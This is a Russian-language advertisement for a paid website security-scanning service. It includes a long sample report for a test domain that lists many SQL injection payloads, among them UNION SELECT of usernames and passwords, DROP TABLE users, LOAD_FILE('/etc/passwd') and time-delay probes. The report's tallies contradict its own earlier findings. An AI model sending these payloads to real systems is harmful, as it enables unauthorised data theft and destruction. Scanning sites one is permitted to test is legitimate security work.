Безопасность
Отличный старт, для любого веб приложения. Модуль поможет найти различные виды уязвимости, такие как: Content-Security-Policy, X-Frame-Options, X-XSS-Protection, Strict-Transport-Security, Referrer-Policy и т.д.
- В течении 24 часов с момента заказа проверка будет сделана;
- Вам на почту будет выслан отчет о проделанной работе в txt файле.
Внимание!!! Во избежании юридической ответственности при заказе данной услуги, Вы подтверждаете, что являетесь администратором проверяемого веб приложения и даете на то официальное согласие.
Цена: 1000 рублей
Хотите быстро "нащупать" подозрительные места — этот модуль может помочь, но с большой осторожностью и пониманием, он может переоценить предполагаемую уязвимость. Лучше использовать этот модуль совместно с остальными.
- В течении 24 часов с момента заказа проверка будет сделана;
- Вам на почту будет выслан отчет о проделанной работе в txt файле.
Внимание!!! Во избежании юридической ответственности при заказе данной услуги, Вы подтверждаете, что являетесь администратором проверяемого веб приложения и даете на то официальное согласие.
Цена: 500 рублей
Здесь уязвимость определяется только если в ответе обнаружена специфическая ошибка базы данных из заранее заданных шаблонов, т.е находятся конкретные сообщения об ошибках SQL-сервера (MySQL, MSSQL, Oracle, PostgreSQL), что гораздо точнее и надёжнее предидущего модуля "Полезная нагрузка".
- В течении 24 часов с момента заказа проверка будет сделана;
- Вам на почту будет выслан отчет о проделанной работе.
Внимание!!! Во избежании юридической ответственности при заказе данной услуги, Вы подтверждаете, что являетесь администратором проверяемого веб приложения и даете на то официальное согласие.
Цена: 3000 рублей
Уязвимость - отчет
Ознакомьтесь с отчетами модулей на наглядном примере:
Проверка URL: https://web.test.ru/
- SQL-инъекция: не применимо (нет параметров)
- XSS-тест: не применимо (нет параметров)
- Заголовок Content-Security-Policy не найден — Плохо! Рекомендуется добавить этот заголовок для повышения безопасности.
- Заголовок X-Frame-Options найден — Хорошо, этот заголовок повышает безопасность.
- Заголовок X-XSS-Protection найден — Хорошо, этот заголовок повышает безопасность.
- Заголовок Strict-Transport-Security не найден — Плохо! Рекомендуется добавить этот заголовок для повышения безопасности.
- Заголовок Referrer-Policy не найден — Плохо! Рекомендуется добавить этот заголовок для повышения безопасности.
- Заголовок X-Content-Type-Options найден — Хорошо, этот заголовок повышает безопасность.
- Атрибут secure файла cookie не найден — Плохо! Рекомендуется установить Secure для cookie, чтобы они передавались только по HTTPS.
- Cookie не имеет атрибута HttpOnly — Плохо! Рекомендуется установить HttpOnly, чтобы защитить cookie от доступа через JavaScript.
- Атрибут secure файла cookie не найден — Плохо! Рекомендуется установить Secure для cookie, чтобы они передавались только по HTTPS.
- Cookie не имеет атрибута HttpOnly — Плохо! Рекомендуется установить HttpOnly, чтобы защитить cookie от доступа через JavaScript.
- Атрибут secure файла cookie не найден — Плохо! Рекомендуется установить Secure для cookie, чтобы они передавались только по HTTPS.
- Cookie не имеет атрибута HttpOnly — Плохо! Рекомендуется установить HttpOnly, чтобы защитить cookie от доступа через JavaScript.
- Атрибут secure файла cookie не найден — Плохо! Рекомендуется установить Secure для cookie, чтобы они передавались только по HTTPS.
- Cookie не имеет атрибута HttpOnly — Плохо! Рекомендуется установить HttpOnly, чтобы защитить cookie от доступа через JavaScript.
- Атрибут secure файла cookie не найден — Плохо! Рекомендуется установить Secure для cookie, чтобы они передавались только по HTTPS.
- Cookie не имеет атрибута HttpOnly — Плохо! Рекомендуется установить HttpOnly, чтобы защитить cookie от доступа через JavaScript.
- Атрибут secure файла cookie не найден — Плохо! Рекомендуется установить Secure для cookie, чтобы они передавались только по HTTPS.
- Cookie не имеет атрибута HttpOnly — Плохо! Рекомендуется установить HttpOnly, чтобы защитить cookie от доступа через JavaScript.
- Атрибут secure файла cookie не найден — Плохо! Рекомендуется установить Secure для cookie, чтобы они передавались только по HTTPS.
- Атрибут HttpOnly для cookie найден — Хорошо, cookie защищены от XSS.
- Атрибут secure файла cookie не найден — Плохо! Рекомендуется установить Secure для cookie, чтобы они передавались только по HTTPS.
- Cookie не имеет атрибута HttpOnly — Плохо! Рекомендуется установить HttpOnly, чтобы защитить cookie от доступа через JavaScript.
- Кодирование страницы задано — Хорошо, это помогает корректно отображать символы.
- Тег meta с атрибутом viewport найден — Хорошо, сайт адаптируется под мобильные устройства.
- Форма входа не найдена — Если сайт не требует авторизации, это нормально.
- Поле для ввода пароля не найдено — Если нет форм с паролями, это нормально.
- Файл cookie найден — Хорошо, проверьте их безопасность.
- Атрибут secure файла cookie не найден — Плохо! Рекомендуется установить Secure для cookie.
- Директория robots.txt найдена — Хорошо, поисковые роботы могут ориентироваться на правила.
- Файл sitemap.xml найден — Хорошо, помогает поисковым системам индексировать сайт.
- Ошибки базы данных найдены — Плохо! Проверьте обработку ошибок и не выводите детали пользователю.
- SSL-сертификат найден — Хорошо, соединение защищено.
- DNS-рекорды найдены — Хорошо, домен корректно разрешается.
[-] Нет уязвимости с полезной нагрузкой: ' OR '1'='1
[+] Возможная уязвимость SQL-инъекции с полезной нагрузкой: ' OR '1'='1' --
[-] Нет уязвимости с полезной нагрузкой: " OR "1"="1
[-] Нет уязвимости с полезной нагрузкой: ' UNION SELECT NULL, NULL --
[+] Возможная уязвимость SQL-инъекции с полезной нагрузкой: ' UNION SELECT username, password FROM users --
[+] Возможная уязвимость SQL-инъекции с полезной нагрузкой: '; DROP TABLE users; --
[+] Возможная уязвимость SQL-инъекции с полезной нагрузкой: " OR 1=1 --
[-] Нет уязвимости с полезной нагрузкой: ' AND (SELECT COUNT(*) FROM users) > 0 --
[-] Нет уязвимости с полезной нагрузкой: ' OR EXISTS(SELECT * FROM users WHERE username='admin' AND password='password') --
[+] Возможная уязвимость SQL-инъекции с полезной нагрузкой: ' AND 1=2 UNION SELECT NULL, username, password FROM users --
[-] Нет уязвимости с полезной нагрузкой: '; --
[-] Нет уязвимости с полезной нагрузкой: ' OR 'x'='x
[+] Возможная уязвимость SQL-инъекции с полезной нагрузкой: ' AND '1'='1' --
[-] Нет уязвимости с полезной нагрузкой: ' AND 'a'='a'
[-] Нет уязвимости с полезной нагрузкой: ' AND 1=1; --
[+] Возможная уязвимость SQL-инъекции с полезной нагрузкой: ' AND 1=0 UNION SELECT NULL, username, password FROM users --
[+] Возможная уязвимость SQL-инъекции с полезной нагрузкой: ' AND 1=1 LIMIT 1; --
[+] Возможная уязвимость SQL-инъекции с полезной нагрузкой: ' OR '1'='1' --
[-] Нет уязвимости с полезной нагрузкой: " OR "1"="1
[-] Нет уязвимости с полезной нагрузкой: ' UNION SELECT NULL, NULL --
[+] Возможная уязвимость SQL-инъекции с полезной нагрузкой: ' UNION SELECT username, password FROM users --
[+] Возможная уязвимость SQL-инъекции с полезной нагрузкой: '; DROP TABLE users; --
[+] Возможная уязвимость SQL-инъекции с полезной нагрузкой: " OR 1=1 --
[-] Нет уязвимости с полезной нагрузкой: ' AND (SELECT COUNT(*) FROM users) > 0 --
[-] Нет уязвимости с полезной нагрузкой: ' OR EXISTS(SELECT * FROM users WHERE username='admin' AND password='password') --
[+] Возможная уязвимость SQL-инъекции с полезной нагрузкой: ' AND 1=2 UNION SELECT NULL, username, password FROM users --
[-] Нет уязвимости с полезной нагрузкой: '; --
[-] Нет уязвимости с полезной нагрузкой: ' OR 'x'='x
[+] Возможная уязвимость SQL-инъекции с полезной нагрузкой: ' AND '1'='1' --
[-] Нет уязвимости с полезной нагрузкой: ' AND 'a'='a'
[-] Нет уязвимости с полезной нагрузкой: ' AND 1=1; --
[+] Возможная уязвимость SQL-инъекции с полезной нагрузкой: ' AND 1=0 UNION SELECT NULL, username, password FROM users --
[+] Возможная уязвимость SQL-инъекции с полезной нагрузкой: ' AND 1=1 LIMIT 1; --
GET (одинарные кавычки): Нет уязвимости с payload: '' OR '1'='1
GET (одинарные кавычки): Нет уязвимости с payload: '' OR '1'='1' --
GET (одинарные кавычки): Нет уязвимости с payload: '" OR "1"="1
GET (одинарные кавычки): Нет уязвимости с payload: '' UNION SELECT NULL, NULL --
GET (одинарные кавычки): Нет уязвимости с payload: '' UNION SELECT @@version, user() --
GET (одинарные кавычки): Нет уязвимости с payload: ''; DROP TABLE users; --
GET (одинарные кавычки): Нет уязвимости с payload: '" OR 1=1 --
GET (одинарные кавычки): Нет уязвимости с payload: '' AND (SELECT COUNT(*) FROM users) > 0 --
GET (одинарные кавычки): Нет уязвимости с payload: '' OR EXISTS(SELECT * FROM users WHERE username='admin') --
GET (одинарные кавычки): Нет уязвимости с payload: '' AND 1=2 UNION SELECT NULL, @@version --
GET (одинарные кавычки): Нет уязвимости с payload: ''; --
GET (одинарные кавычки): Нет уязвимости с payload: '' OR 'x'='x
GET (одинарные кавычки): Нет уязвимости с payload: '' AND SLEEP(5) --
GET (одинарные кавычки): Нет уязвимости с payload: '' || '1'='1
GET (одинарные кавычки): Нет уязвимости с payload: ' OR 1=1
GET (одинарные кавычки): Нет уязвимости с payload: ' OR 1=1 --
GET (одинарные кавычки): Нет уязвимости с payload: ' OR 1=1#
GET (одинарные кавычки): Нет уязвимости с payload: ' AND 1=0 UNION SELECT @@version --
GET (одинарные кавычки): Нет уязвимости с payload: '" OR "1"="1
GET (одинарные кавычки): Нет уязвимости с payload: '" UNION SELECT NULL, NULL --
GET (одинарные кавычки): Нет уязвимости с payload: '" AND 1=0 UNION SELECT @@version --
GET (одинарные кавычки): Нет уязвимости с payload: '' ORDER BY 999 --
GET (одинарные кавычки): Нет уязвимости с payload: '' GROUP BY 1 --
GET (одинарные кавычки): Нет уязвимости с payload: '' HAVING 1=1 --
GET (одинарные кавычки): Нет уязвимости с payload: '' AND EXTRACTVALUE(0, CONCAT(0x5c, USER())) --
GET (одинарные кавычки): Нет уязвимости с payload: '' UNION SELECT LOAD_FILE('/etc/passwd') --
GET (одинарные кавычки): Нет уязвимости с payload: '' || pg_sleep(5) --
GET (одинарные кавычки): Нет уязвимости с payload: ''; WAITFOR DELAY '0:0:5' --
GET (одинарные кавычки): Нет уязвимости с payload: '' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5) --
GET (двойные кавычки): Нет уязвимости с payload: "' OR '1'='1
GET (двойные кавычки): Нет уязвимости с payload: "' OR '1'='1' --
GET (двойные кавычки): Нет уязвимости с payload: "" OR "1"="1
GET (двойные кавычки): Нет уязвимости с payload: "' UNION SELECT NULL, NULL --
GET (двойные кавычки): Нет уязвимости с payload: "' UNION SELECT @@version, user() --
GET (двойные кавычки): Нет уязвимости с payload: "'; DROP TABLE users; --
GET (двойные кавычки): Нет уязвимости с payload: "" OR 1=1 --
GET (двойные кавычки): Нет уязвимости с payload: "' AND (SELECT COUNT(*) FROM users) > 0 --
GET (двойные кавычки): Нет уязвимости с payload: "' OR EXISTS(SELECT * FROM users WHERE username='admin') --
GET (двойные кавычки): Нет уязвимости с payload: "' AND 1=2 UNION SELECT NULL, @@version --
GET (двойные кавычки): Нет уязвимости с payload: "'; --
GET (двойные кавычки): Нет уязвимости с payload: "' OR 'x'='x
GET (двойные кавычки): Нет уязвимости с payload: "' AND SLEEP(5) --
GET (двойные кавычки): Нет уязвимости с payload: "' || '1'='1
GET (двойные кавычки): Нет уязвимости с payload: " OR 1=1
GET (двойные кавычки): Нет уязвимости с payload: " OR 1=1 --
GET (двойные кавычки): Нет уязвимости с payload: " OR 1=1#
GET (двойные кавычки): Нет уязвимости с payload: " AND 1=0 UNION SELECT @@version --
GET (двойные кавычки): Нет уязвимости с payload: "" OR "1"="1
GET (двойные кавычки): Нет уязвимости с payload: "" UNION SELECT NULL, NULL --
GET (двойные кавычки): Нет уязвимости с payload: "" AND 1=0 UNION SELECT @@version --
GET (двойные кавычки): Нет уязвимости с payload: "' ORDER BY 999 --
GET (двойные кавычки): Нет уязвимости с payload: "' GROUP BY 1 --
GET (двойные кавычки): Нет уязвимости с payload: "' HAVING 1=1 --
GET (двойные кавычки): Нет уязвимости с payload: "' AND EXTRACTVALUE(0, CONCAT(0x5c, USER())) --
GET (двойные кавычки): Нет уязвимости с payload: "' UNION SELECT LOAD_FILE('/etc/passwd') --
GET (двойные кавычки): Нет уязвимости с payload: "' || pg_sleep(5) --
GET (двойные кавычки): Нет уязвимости с payload: "'; WAITFOR DELAY '0:0:5' --
GET (двойные кавычки): Нет уязвимости с payload: "' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5) --
GET (без кавычек): Нет уязвимости с payload: ' OR '1'='1
GET (без кавычек): Нет уязвимости с payload: ' OR '1'='1' --
GET (без кавычек): Нет уязвимости с payload: " OR "1"="1
GET (без кавычек): Нет уязвимости с payload: ' UNION SELECT NULL, NULL --
GET (без кавычек): Нет уязвимости с payload: ' UNION SELECT @@version, user() --
GET (без кавычек): Нет уязвимости с payload: '; DROP TABLE users; --
GET (без кавычек): Нет уязвимости с payload: " OR 1=1 --
GET (без кавычек): Нет уязвимости с payload: ' AND (SELECT COUNT(*) FROM users) > 0 --
GET (без кавычек): Нет уязвимости с payload: ' OR EXISTS(SELECT * FROM users WHERE username='admin') --
GET (без кавычек): Нет уязвимости с payload: ' AND 1=2 UNION SELECT NULL, @@version --
GET (без кавычек): Нет уязвимости с payload: '; --
GET (без кавычек): Нет уязвимости с payload: ' OR 'x'='x
GET (без кавычек): Нет уязвимости с payload: ' AND SLEEP(5) --
GET (без кавычек): Нет уязвимости с payload: ' || '1'='1
GET (без кавычек): Нет уязвимости с payload: OR 1=1
GET (без кавычек): Нет уязвимости с payload: OR 1=1 --
GET (без кавычек): Нет уязвимости с payload: OR 1=1#
GET (без кавычек): Нет уязвимости с payload: AND 1=0 UNION SELECT @@version --
GET (без кавычек): Нет уязвимости с payload: " OR "1"="1
GET (без кавычек): Нет уязвимости с payload: " UNION SELECT NULL, NULL --
GET (без кавычек): Нет уязвимости с payload: " AND 1=0 UNION SELECT @@version --
GET (без кавычек): Нет уязвимости с payload: ' ORDER BY 999 --
GET (без кавычек): Нет уязвимости с payload: ' GROUP BY 1 --
GET (без кавычек): Нет уязвимости с payload: ' HAVING 1=1 --
GET (без кавычек): Нет уязвимости с payload: ' AND EXTRACTVALUE(0, CONCAT(0x5c, USER())) --
GET (без кавычек): Нет уязвимости с payload: ' UNION SELECT LOAD_FILE('/etc/passwd') --
GET (без кавычек): Нет уязвимости с payload: ' || pg_sleep(5) --
GET (без кавычек): Нет уязвимости с payload: '; WAITFOR DELAY '0:0:5' --
GET (без кавычек): Нет уязвимости с payload: ' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5) --
POST (одинарные кавычки): Нет уязвимости с payload: '' OR '1'='1 | Время: 1.00s
POST (одинарные кавычки): Нет уязвимости с payload: '' OR '1'='1' -- | Время: 1.16s
POST (одинарные кавычки): Нет уязвимости с payload: '" OR "1"="1 | Время: 1.01s
POST (одинарные кавычки): Нет уязвимости с payload: '' UNION SELECT NULL, NULL -- | Время: 1.02s
POST (одинарные кавычки): Нет уязвимости с payload: '' UNION SELECT @@version, user() -- | Время: 0.95s
POST (одинарные кавычки): Нет уязвимости с payload: ''; DROP TABLE users; -- | Время: 1.12s
POST (одинарные кавычки): Нет уязвимости с payload: '" OR 1=1 -- | Время: 1.23s
POST (одинарные кавычки): Нет уязвимости с payload: '' AND (SELECT COUNT(*) FROM users) > 0 -- | Время: 1.11s
POST (одинарные кавычки): Нет уязвимости с payload: '' OR EXISTS(SELECT * FROM users WHERE username='admin') -- | Время: 1.13s
POST (одинарные кавычки): Нет уязвимости с payload: '' AND 1=2 UNION SELECT NULL, @@version -- | Время: 0.93s
POST (одинарные кавычки): Нет уязвимости с payload: ''; -- | Время: 1.09s
POST (одинарные кавычки): Нет уязвимости с payload: '' OR 'x'='x | Время: 1.40s
POST (одинарные кавычки): Нет уязвимости с payload: '' AND SLEEP(5) -- | Время: 1.01s
POST (одинарные кавычки): Нет уязвимости с payload: '' || '1'='1 | Время: 0.99s
POST (одинарные кавычки): Нет уязвимости с payload: ' OR 1=1 | Время: 1.01s
POST (одинарные кавычки): Нет уязвимости с payload: ' OR 1=1 -- | Время: 0.98s
POST (одинарные кавычки): Нет уязвимости с payload: ' OR 1=1# | Время: 1.18s
POST (одинарные кавычки): Нет уязвимости с payload: ' AND 1=0 UNION SELECT @@version -- | Время: 1.00s
POST (одинарные кавычки): Нет уязвимости с payload: '" OR "1"="1 | Время: 1.05s
POST (одинарные кавычки): Нет уязвимости с payload: '" UNION SELECT NULL, NULL -- | Время: 1.08s
POST (одинарные кавычки): Нет уязвимости с payload: '" AND 1=0 UNION SELECT @@version -- | Время: 0.92s
POST (одинарные кавычки): Нет уязвимости с payload: '' ORDER BY 999 -- | Время: 1.19s
POST (одинарные кавычки): Нет уязвимости с payload: '' GROUP BY 1 -- | Время: 1.23s
POST (одинарные кавычки): Нет уязвимости с payload: '' HAVING 1=1 -- | Время: 0.99s
POST (одинарные кавычки): Нет уязвимости с payload: '' AND EXTRACTVALUE(0, CONCAT(0x5c, USER())) -- | Время: 1.03s
POST (одинарные кавычки): Нет уязвимости с payload: '' UNION SELECT LOAD_FILE('/etc/passwd') -- | Время: 1.09s
POST (одинарные кавычки): Нет уязвимости с payload: '' || pg_sleep(5) -- | Время: 1.16s
POST (одинарные кавычки): Нет уязвимости с payload: ''; WAITFOR DELAY '0:0:5' -- | Время: 0.97s
POST (одинарные кавычки): Нет уязвимости с payload: '' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5) -- | Время: 1.12s
POST (двойные кавычки): Нет уязвимости с payload: "' OR '1'='1 | Время: 0.99s
POST (двойные кавычки): Нет уязвимости с payload: "' OR '1'='1' -- | Время: 1.02s
POST (двойные кавычки): Нет уязвимости с payload: "" OR "1"="1 | Время: 1.26s
POST (двойные кавычки): Нет уязвимости с payload: "' UNION SELECT NULL, NULL -- | Время: 0.97s
POST (двойные кавычки): Нет уязвимости с payload: "' UNION SELECT @@version, user() -- | Время: 1.02s
POST (двойные кавычки): Нет уязвимости с payload: "'; DROP TABLE users; -- | Время: 1.31s
POST (двойные кавычки): Нет уязвимости с payload: "" OR 1=1 -- | Время: 1.05s
POST (двойные кавычки): Нет уязвимости с payload: "' AND (SELECT COUNT(*) FROM users) > 0 -- | Время: 1.36s
POST (двойные кавычки): Нет уязвимости с payload: "' OR EXISTS(SELECT * FROM users WHERE username='admin') -- | Время: 0.99s
POST (двойные кавычки): Нет уязвимости с payload: "' AND 1=2 UNION SELECT NULL, @@version -- | Время: 1.05s
POST (двойные кавычки): Нет уязвимости с payload: "'; -- | Время: 1.17s
POST (двойные кавычки): Нет уязвимости с payload: "' OR 'x'='x | Время: 1.93s
POST (двойные кавычки): Нет уязвимости с payload: "' AND SLEEP(5) -- | Время: 1.29s
POST (двойные кавычки): Нет уязвимости с payload: "' || '1'='1 | Время: 1.11s
POST (двойные кавычки): Нет уязвимости с payload: " OR 1=1 | Время: 1.21s
POST (двойные кавычки): Нет уязвимости с payload: " OR 1=1 -- | Время: 1.27s
POST (двойные кавычки): Нет уязвимости с payload: " OR 1=1# | Время: 1.50s
POST (двойные кавычки): Нет уязвимости с payload: " AND 1=0 UNION SELECT @@version -- | Время: 1.28s
POST (двойные кавычки): Нет уязвимости с payload: "" OR "1"="1 | Время: 1.27s
POST (двойные кавычки): Нет уязвимости с payload: "" UNION SELECT NULL, NULL -- | Время: 1.09s
POST (двойные кавычки): Нет уязвимости с payload: "" AND 1=0 UNION SELECT @@version -- | Время: 1.12s
POST (двойные кавычки): Нет уязвимости с payload: "' ORDER BY 999 -- | Время: 1.10s
POST (двойные кавычки): Нет уязвимости с payload: "' GROUP BY 1 -- | Время: 1.19s
POST (двойные кавычки): Нет уязвимости с payload: "' HAVING 1=1 -- | Время: 1.32s
POST (двойные кавычки): Нет уязвимости с payload: "' AND EXTRACTVALUE(0, CONCAT(0x5c, USER())) -- | Время: 1.11s
POST (двойные кавычки): Нет уязвимости с payload: "' UNION SELECT LOAD_FILE('/etc/passwd') -- | Время: 1.46s
POST (двойные кавычки): Нет уязвимости с payload: "' || pg_sleep(5) -- | Время: 1.16s
POST (двойные кавычки): Нет уязвимости с payload: "'; WAITFOR DELAY '0:0:5' -- | Время: 1.22s
POST (двойные кавычки): Нет уязвимости с payload: "' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5) -- | Время: 1.11s
POST (без кавычек): Нет уязвимости с payload: ' OR '1'='1 | Время: 1.28s
POST (без кавычек): Нет уязвимости с payload: ' OR '1'='1' -- | Время: 1.34s
POST (без кавычек): Нет уязвимости с payload: " OR "1"="1 | Время: 1.13s
POST (без кавычек): Нет уязвимости с payload: ' UNION SELECT NULL, NULL -- | Время: 1.25s
POST (без кавычек): Нет уязвимости с payload: ' UNION SELECT @@version, user() -- | Время: 1.13s
POST (без кавычек): Нет уязвимости с payload: '; DROP TABLE users; -- | Время: 1.03s
POST (без кавычек): Нет уязвимости с payload: " OR 1=1 -- | Время: 1.11s
POST (без кавычек): Нет уязвимости с payload: ' AND (SELECT COUNT(*) FROM users) > 0 -- | Время: 1.05s
POST (без кавычек): Нет уязвимости с payload: ' OR EXISTS(SELECT * FROM users WHERE username='admin') -- | Время: 1.94s
POST (без кавычек): Нет уязвимости с payload: ' AND 1=2 UNION SELECT NULL, @@version -- | Время: 1.08s
POST (без кавычек): Нет уязвимости с payload: '; -- | Время: 1.41s
POST (без кавычек): Нет уязвимости с payload: ' OR 'x'='x | Время: 1.10s
POST (без кавычек): Нет уязвимости с payload: ' AND SLEEP(5) -- | Время: 1.27s
POST (без кавычек): Нет уязвимости с payload: ' || '1'='1 | Время: 1.52s
POST (без кавычек): Нет уязвимости с payload: OR 1=1 | Время: 1.04s
POST (без кавычек): Нет уязвимости с payload: OR 1=1 -- | Время: 1.08s
POST (без кавычек): Нет уязвимости с payload: OR 1=1# | Время: 1.20s
POST (без кавычек): Нет уязвимости с payload: AND 1=0 UNION SELECT @@version -- | Время: 1.06s
POST (без кавычек): Нет уязвимости с payload: " OR "1"="1 | Время: 1.23s
POST (без кавычек): Нет уязвимости с payload: " UNION SELECT NULL, NULL -- | Время: 1.09s
POST (без кавычек): Нет уязвимости с payload: " AND 1=0 UNION SELECT @@version -- | Время: 0.95s
POST (без кавычек): Нет уязвимости с payload: ' ORDER BY 999 -- | Время: 1.00s
POST (без кавычек): Нет уязвимости с payload: ' GROUP BY 1 -- | Время: 1.00s
POST (без кавычек): Нет уязвимости с payload: ' HAVING 1=1 -- | Время: 1.13s
POST (без кавычек): Нет уязвимости с payload: ' AND EXTRACTVALUE(0, CONCAT(0x5c, USER())) -- | Время: 1.10s
POST (без кавычек): Нет уязвимости с payload: ' UNION SELECT LOAD_FILE('/etc/passwd') -- | Время: 0.96s
POST (без кавычек): Нет уязвимости с payload: ' || pg_sleep(5) -- | Время: 0.97s
POST (без кавычек): Нет уязвимости с payload: '; WAITFOR DELAY '0:0:5' -- | Время: 1.19s
POST (без кавычек): Нет уязвимости с payload: ' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5) -- | Время: 1.19s
=== ИТОГИ ПРОВЕРКИ ===
Всего проверено payloads: 41
Найдено уязвимостей: 0
URL проверен: https://web.test.ru/
GET (одинарные кавычки): Нет уязвимости с payload: '' OR '1'='1' --
GET (одинарные кавычки): Нет уязвимости с payload: '" OR "1"="1
GET (одинарные кавычки): Нет уязвимости с payload: '' UNION SELECT NULL, NULL --
GET (одинарные кавычки): Нет уязвимости с payload: '' UNION SELECT @@version, user() --
GET (одинарные кавычки): Нет уязвимости с payload: ''; DROP TABLE users; --
GET (одинарные кавычки): Нет уязвимости с payload: '" OR 1=1 --
GET (одинарные кавычки): Нет уязвимости с payload: '' AND (SELECT COUNT(*) FROM users) > 0 --
GET (одинарные кавычки): Нет уязвимости с payload: '' OR EXISTS(SELECT * FROM users WHERE username='admin') --
GET (одинарные кавычки): Нет уязвимости с payload: '' AND 1=2 UNION SELECT NULL, @@version --
GET (одинарные кавычки): Нет уязвимости с payload: ''; --
GET (одинарные кавычки): Нет уязвимости с payload: '' OR 'x'='x
GET (одинарные кавычки): Нет уязвимости с payload: '' AND SLEEP(5) --
GET (одинарные кавычки): Нет уязвимости с payload: '' || '1'='1
GET (одинарные кавычки): Нет уязвимости с payload: ' OR 1=1
GET (одинарные кавычки): Нет уязвимости с payload: ' OR 1=1 --
GET (одинарные кавычки): Нет уязвимости с payload: ' OR 1=1#
GET (одинарные кавычки): Нет уязвимости с payload: ' AND 1=0 UNION SELECT @@version --
GET (одинарные кавычки): Нет уязвимости с payload: '" OR "1"="1
GET (одинарные кавычки): Нет уязвимости с payload: '" UNION SELECT NULL, NULL --
GET (одинарные кавычки): Нет уязвимости с payload: '" AND 1=0 UNION SELECT @@version --
GET (одинарные кавычки): Нет уязвимости с payload: '' ORDER BY 999 --
GET (одинарные кавычки): Нет уязвимости с payload: '' GROUP BY 1 --
GET (одинарные кавычки): Нет уязвимости с payload: '' HAVING 1=1 --
GET (одинарные кавычки): Нет уязвимости с payload: '' AND EXTRACTVALUE(0, CONCAT(0x5c, USER())) --
GET (одинарные кавычки): Нет уязвимости с payload: '' UNION SELECT LOAD_FILE('/etc/passwd') --
GET (одинарные кавычки): Нет уязвимости с payload: '' || pg_sleep(5) --
GET (одинарные кавычки): Нет уязвимости с payload: ''; WAITFOR DELAY '0:0:5' --
GET (одинарные кавычки): Нет уязвимости с payload: '' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5) --
GET (двойные кавычки): Нет уязвимости с payload: "' OR '1'='1
GET (двойные кавычки): Нет уязвимости с payload: "' OR '1'='1' --
GET (двойные кавычки): Нет уязвимости с payload: "" OR "1"="1
GET (двойные кавычки): Нет уязвимости с payload: "' UNION SELECT NULL, NULL --
GET (двойные кавычки): Нет уязвимости с payload: "' UNION SELECT @@version, user() --
GET (двойные кавычки): Нет уязвимости с payload: "'; DROP TABLE users; --
GET (двойные кавычки): Нет уязвимости с payload: "" OR 1=1 --
GET (двойные кавычки): Нет уязвимости с payload: "' AND (SELECT COUNT(*) FROM users) > 0 --
GET (двойные кавычки): Нет уязвимости с payload: "' OR EXISTS(SELECT * FROM users WHERE username='admin') --
GET (двойные кавычки): Нет уязвимости с payload: "' AND 1=2 UNION SELECT NULL, @@version --
GET (двойные кавычки): Нет уязвимости с payload: "'; --
GET (двойные кавычки): Нет уязвимости с payload: "' OR 'x'='x
GET (двойные кавычки): Нет уязвимости с payload: "' AND SLEEP(5) --
GET (двойные кавычки): Нет уязвимости с payload: "' || '1'='1
GET (двойные кавычки): Нет уязвимости с payload: " OR 1=1
GET (двойные кавычки): Нет уязвимости с payload: " OR 1=1 --
GET (двойные кавычки): Нет уязвимости с payload: " OR 1=1#
GET (двойные кавычки): Нет уязвимости с payload: " AND 1=0 UNION SELECT @@version --
GET (двойные кавычки): Нет уязвимости с payload: "" OR "1"="1
GET (двойные кавычки): Нет уязвимости с payload: "" UNION SELECT NULL, NULL --
GET (двойные кавычки): Нет уязвимости с payload: "" AND 1=0 UNION SELECT @@version --
GET (двойные кавычки): Нет уязвимости с payload: "' ORDER BY 999 --
GET (двойные кавычки): Нет уязвимости с payload: "' GROUP BY 1 --
GET (двойные кавычки): Нет уязвимости с payload: "' HAVING 1=1 --
GET (двойные кавычки): Нет уязвимости с payload: "' AND EXTRACTVALUE(0, CONCAT(0x5c, USER())) --
GET (двойные кавычки): Нет уязвимости с payload: "' UNION SELECT LOAD_FILE('/etc/passwd') --
GET (двойные кавычки): Нет уязвимости с payload: "' || pg_sleep(5) --
GET (двойные кавычки): Нет уязвимости с payload: "'; WAITFOR DELAY '0:0:5' --
GET (двойные кавычки): Нет уязвимости с payload: "' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5) --
GET (без кавычек): Нет уязвимости с payload: ' OR '1'='1
GET (без кавычек): Нет уязвимости с payload: ' OR '1'='1' --
GET (без кавычек): Нет уязвимости с payload: " OR "1"="1
GET (без кавычек): Нет уязвимости с payload: ' UNION SELECT NULL, NULL --
GET (без кавычек): Нет уязвимости с payload: ' UNION SELECT @@version, user() --
GET (без кавычек): Нет уязвимости с payload: '; DROP TABLE users; --
GET (без кавычек): Нет уязвимости с payload: " OR 1=1 --
GET (без кавычек): Нет уязвимости с payload: ' AND (SELECT COUNT(*) FROM users) > 0 --
GET (без кавычек): Нет уязвимости с payload: ' OR EXISTS(SELECT * FROM users WHERE username='admin') --
GET (без кавычек): Нет уязвимости с payload: ' AND 1=2 UNION SELECT NULL, @@version --
GET (без кавычек): Нет уязвимости с payload: '; --
GET (без кавычек): Нет уязвимости с payload: ' OR 'x'='x
GET (без кавычек): Нет уязвимости с payload: ' AND SLEEP(5) --
GET (без кавычек): Нет уязвимости с payload: ' || '1'='1
GET (без кавычек): Нет уязвимости с payload: OR 1=1
GET (без кавычек): Нет уязвимости с payload: OR 1=1 --
GET (без кавычек): Нет уязвимости с payload: OR 1=1#
GET (без кавычек): Нет уязвимости с payload: AND 1=0 UNION SELECT @@version --
GET (без кавычек): Нет уязвимости с payload: " OR "1"="1
GET (без кавычек): Нет уязвимости с payload: " UNION SELECT NULL, NULL --
GET (без кавычек): Нет уязвимости с payload: " AND 1=0 UNION SELECT @@version --
GET (без кавычек): Нет уязвимости с payload: ' ORDER BY 999 --
GET (без кавычек): Нет уязвимости с payload: ' GROUP BY 1 --
GET (без кавычек): Нет уязвимости с payload: ' HAVING 1=1 --
GET (без кавычек): Нет уязвимости с payload: ' AND EXTRACTVALUE(0, CONCAT(0x5c, USER())) --
GET (без кавычек): Нет уязвимости с payload: ' UNION SELECT LOAD_FILE('/etc/passwd') --
GET (без кавычек): Нет уязвимости с payload: ' || pg_sleep(5) --
GET (без кавычек): Нет уязвимости с payload: '; WAITFOR DELAY '0:0:5' --
GET (без кавычек): Нет уязвимости с payload: ' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5) --
POST (одинарные кавычки): Нет уязвимости с payload: '' OR '1'='1 | Время: 1.00s
